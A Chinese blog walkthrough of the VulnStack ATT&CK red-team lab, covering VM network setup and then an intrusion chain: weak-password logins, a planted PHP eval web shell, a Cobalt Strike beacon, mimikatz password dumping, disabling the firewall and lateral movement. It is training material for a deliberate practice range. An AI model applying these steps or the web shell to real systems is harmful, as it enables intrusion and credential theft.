• VulnStack靶机练习


    ATT&CK红队评估一

    镜像下载

    镜像下载地址

    网络配置

    网络拓扑图

    VMware 网络配置

    使用 VMware 的『虚拟网络编辑器』添加两个虚拟网络。

    虚拟网络名称 网段 DHCP
    VMnet3 192.168.72.0/24
    VMnet4 192.168.52.0/24

    虚拟机网络配置

    虚拟机 网段 虚拟网络接口
    Windows 7 x64 192.168.72.0/24,192.168.52.0/24 VMnet3,VMnet4
    Win2K3 Metasploitable 192.168.52.0/24 VMnet4
    Windows Server 2008 R2 x64 192.168.52.0/24 VMnet4
    Kali(用于攻击的机器) 192.168.72.0/24 VMnet3

    虚拟机配置

    Windows 7 x64

    开机后登录系统,密码为 hongrisec@2019

    打开网络适配器,可以看到有两个网络连接,其中『本地连接4』的网段为 192.168.52.0/24,我们修改『本地连接』的网段为 192.168.72.0/24

    在弹出的对话框中选择『公用网络』,将该网络连接设置为公用网络。

    然后进入 C:\phpStudy,运行 phpStudy.exe

    检查一下网络配置:

    ipconfig | findstr "192.168"
    

    Win2K3 Metasploitable

    开机后登录系统,密码为 hongrisec@2019,首次登录要求修改密码,可以统一修改为 hongrisec@2022

    登录后查看本机 IP 是否正常。

    ipconfig
    

    Windows Server 2008 R2 x64

    开机后登录系统,密码为 hongrisec@2019,首次登录要求修改密码,可以统一修改为 hongrisec@2022

    登录后查看本机 IP 是否正常。

    ipconfig
    

    至此环境部署完成。

    靶机练习

    信息收集

    使用 nmap 进行端口扫描。

    nmap -Pn -p- -sV 192.168.72.143
    

    发现 80 端口开放,直接访问一下,发现是一个 phpStudy 的探针。

    直接尝试 MySQL 弱口令( root/root )。

    既然已经知道 MySQL 密码,直接登录 phpMyAdmin

    检查一下能否写文件:

    SHOW VARIABLES LIKE '%secure_file_priv%'
    

    发现不能写文件,所以不能直接写入 WebShell。

    浏览一下数据库,发现存在一个数据库 newyxcms

    很可能存在一个 cms 程序,所以尝试访问 http://192.168.72.143/newyxcms/http://192.168.72.143/yxcms/ ,发现 http://192.168.72.143/yxcms/ 成功访问。

    直接找到后台登录入口 http://192.168.72.143/yxcms/index.php?r=admin/index/login,尝试一下弱口令 admin/123456,登录成功。

    漏洞利用

    发现『全局设置 -> 前台模板』可以插入 PHP 代码,修改 index_index.php,插入一句话木马。

    <?php eval($_POST['cmd']); ?>
    

    使用蚁剑连接一下。

    横向移动

    查看用户信息:

    查看域信息:

    查看内网其他机器。

    arp -a
    

    上传一个木马。

    在虚拟终端中运行木马:

    .\artifact.exe
    

    Cobalt Strike 中看到目标上线。

    使用 mimikatz 抓一下密码。

    mimikatz sekurlsa::logonpasswords
    

    查看内网其他机器:

    net view
    

    关闭防火墙:

    # 查看防火墙状态
    netsh firewall show state
    # 关闭防火墙
    shell netsh advfirewall set allprofiles state off
    

    提权:

    可以看到目标中多了一个 SYSTEM

    进入 SYSTEM beacon,抓取密码。

    logonpasswords
    

    查看域内机器。

    net view
    

    此时可以看到目标多了机器。

    新建一个监听器,payload 选择 SMB。

    横向移动:

    上线成功,同样的操作可以把所有域内机器上线。

    待续。

  • 相关阅读:
    MongoDB 启动和关闭
    java protostuff 序列化反序列化工具
    第一天
    第六章
    第六章
    第六章
    第六章
    第五章---面向对象---1.软件开发/2.异常处理/3.try...except的详细用法
    第五章-面向对象-1.元类介绍/2.自定义元类控制类的行为/3.控制类的实例化行为/4.控制类的实例化行为的应用
    第五章---面向对象---1.绑定方法与非绑定方法介绍/2.绑定方法与非绑定方法应用/3.反射/4.内置方法
  • 原文地址:https://www.cnblogs.com/zhuangshq/p/16033775.html
Copyright © 2020-2023  润新知